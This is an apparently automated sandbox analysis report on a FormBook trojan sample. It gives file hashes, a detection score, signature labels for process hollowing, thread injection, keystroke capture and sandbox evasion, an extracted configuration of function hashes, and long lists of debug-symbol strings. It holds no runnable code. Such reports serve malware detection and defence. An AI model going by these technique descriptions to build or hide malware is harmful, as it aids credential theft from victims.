Analysis Report SecuriteInfo.com.Trojan.Packed2.42783.14936.6333

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.Packed2.42783.14936.6333 (renamed file extension from 6333 to exe)
Analysis ID: 344595
MD5: 25fcc01067cabbf5d1aa3a2f8b18ed50
SHA1: 9f45d2e8e415ab38f42e4edb9b503ce82fed2402
SHA256: ba4721d93c056ef1763667732344fdc82066d71f0003e18ad03f6d93307b82fe

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x99bf", "KEY1_OFFSET 0x1e3ca", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1e4d3", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1cfa3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x3a0289d", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d719b", "0x9f715010", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad011e04", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014b1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Virustotal: Detection: 28% Perma Link
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.AddInProcess32.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Binary contains paths to debug symbols
Source: Binary string: Windows.Data.Activities.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: syncreg.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: CapabilityAccessManagerClient.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.Search.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: authui.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Signals.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.747630209.000001EDC50E0000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: AddInProcess32.exe, mstsc.exe
Source: Binary string: HolographicExtensions.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000001.00000000.675621631.0000000000712000.00000002.00020000.sdmp, mstsc.exe, 00000006.00000002.1034631298.0000000004C7F000.00000004.00000001.sdmp
Source: Binary string: LanguageOverlayUtil.pdb}S source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: SLC.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: cscobj.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows.pdblR5 source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
Source: Binary string: SettingMonitor.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: StructuredQuery.pdbYS` source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: werconcpl.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Signals.pdbiS0 source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.CloudStore.Schema.Shell.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: d3d10warp.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.ApplicationModel.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: twinui.pcshell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PeopleBand.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: AboveLockAppHost.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ExecModelProxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: grooveex.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: imapi2.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: windows.ui.xaml.pdb6u source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryBroker.pdbf source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: srchadmin.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WindowsCodecs.pdb)Sp source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ApplicationFrame.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb| source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: wkscli.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: mstsc.pdb source: AddInProcess32.exe, 00000001.00000002.724998329.0000000002D60000.00000040.00000001.sdmp
Source: Binary string: WpnClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: NotificationControllerPS.pdbyS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: shdocvw.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: twinapi.pdbg source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: TileControl.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: OneCoreCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PlayToDevice.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: TileDataRepository.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.700089831.0000000005A00000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1048482581.00000000070D0000.00000002.00000001.sdmp
Source: Binary string: msvcp110_win.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: AboveLockAppHost.pdb1SX source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: SndVolSSO.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: winmm.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: TaskFlowUI.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: 5.pdb2R source: WerFault.exe, 0000000A.00000002.761878802.000001EDC4EA8000.00000004.00000020.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Core.TextInput.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: provsvc.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: AppXDeploymentClient.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: dusmapi.pdb%jI source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows.pdb source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Shell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: InputSwitch.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: cflapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: DataExchange.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: provsvc.pdbuj source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Data.Activities.pdbaS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Bcp47mrm.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: usermgrcli.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: kernelbase.pdb source: WerFault.exe, 0000000A.00000003.747630209.000001EDC50E0000.00000004.00000040.sdmp
Source: Binary string: SettingMonitor.pdb:uT source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Core.TextInput.pdbIS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wininet.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: Windows.UI.Immersive.pdb5SD source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: prnfldr.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: twinapi.appcore.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: nlaapi.pdb0t/ source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Networking.Connectivity.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: nsi.pdbRjz source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ActXPrxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.CloudStore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ColorAdapterClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: mlang.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: pcacli.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: combase.pdb8 source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: NotificationControllerPS.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: sppc.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: oleacc.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: wevtapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: framedynos.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: samcli.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: sspicli.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: UiaManager.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dsreg.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepository.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ActionCenter.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: SettingSyncCore.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: msoshext.pdb0 source: WerFault.exe, 0000000A.00000003.747320665.000001EDC8062000.00000004.00000001.sdmp
Source: Binary string: dusmapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: cscapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: d3d11.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ShellCommonCommonProxyStub.pdbuS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: vcruntime140.amd64.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: gdi32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: MobileNetworking.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WindowsCodecs.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: avrt.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: winmm.pdb{ source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: ShellCommonCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: smartscreenps.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: wmiclnt.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: twinui.appcore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: WindowsInternal.ComposableShell.Experiences.Switcher.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: samlib.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: atlthunk.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: bthprops.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: linkinfo.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wscinterop.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: win32u.pdb0 source: WerFault.exe, 0000000A.00000003.739016455.000001EDC6E52000.00000004.00000001.sdmp
Source: Binary string: mscms.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.700089831.0000000005A00000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp, explorer.exe, 00000010.00000002.1048482581.00000000070D0000.00000002.00000001.sdmp
Source: Binary string: user32.pdb source: WerFault.exe, 0000000A.00000003.738993307.000001EDC6E48000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdbn source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Shell.pdbqS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: dxgi.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: IconCodecService.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dlnashext.pdbIj source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WLIDProv.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: UxTheme.pdb source: WerFault.exe, 0000000A.00000003.731495333.000001EDC6EB3000.00000004.00000001.sdmp
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: SettingSyncPolicy.pdbQSx source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: winsta.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Security.Authentication.Web.Core.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: TaskFlowDataEngine.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: WscApi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryBroker.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepository.pdb%St source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: davclnt.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: stobject.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
